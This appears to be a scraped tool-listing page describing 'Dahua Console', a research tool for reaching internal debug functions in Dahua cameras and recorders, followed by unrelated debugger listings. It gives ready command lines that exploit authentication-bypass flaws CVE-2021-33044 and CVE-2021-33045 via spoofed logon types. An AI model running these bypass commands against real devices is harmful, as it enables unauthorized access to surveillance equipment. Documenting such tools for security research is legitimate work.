Dahua Console, access internal debug console and/or other researched functions in Dahua devices.

Last update: Dec 28, 2022

Related tags

Overview

Dahua Console

Version: Pre-alpha
Bugs: Indeed
TODO: Lots of stuff

[Install requirements]

sudo pip3 install -r requirements.txt

[Arguments]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://
   
    :
    
     @
     
      :
      
       
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Release]

[Update]

2021-10-07

Details here: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Protocol needed: DHIP or HTTP/HTTPS (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Protocol needed: DHIP (DHIP do not work with TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Dahua Console, access internal debug console and/or other researched functions in Dahua devices.

Related tags

Overview

Dahua Console

Owner

bashis

Code2flow generates call graphs for dynamic programming language. Code2flow supports Python, Javascript, Ruby, and PHP.

🍦 Never use print() to debug again.

Hunter is a flexible code tracing toolkit.

Visual Interaction with Code - A portable visual debugger for python

一个小脚本，用于trace so中native函数的调用。

Django package to log request values such as device, IP address, user CPU time, system CPU time, No of queries, SQL time, no of cache calls, missing, setting data cache calls for a particular URL with a basic UI.

Visual profiler for Python

Cyberbrain: Python debugging, redefined.

Full featured multi arch/os debugger built on top of PyQt5 and frida

Hdbg - Historical Debugger

Never use print for debugging again

Little helper to run Steam apps under Proton with a GDB debugger

A drop-in replacement for Django's runserver.

Dahua Console, access internal debug console and/or other researched functions in Dahua devices.

AryaBota: An app to teach Python coding via gradual programming and visual output

An improbable web debugger through WebSockets

A toolbar overlay for debugging Flask applications

Parsing ELF and DWARF in Python

Graphical Python debugger which lets you easily view the values of all evaluated expressions

A package containing a lot of useful utilities for Python developing and debugging.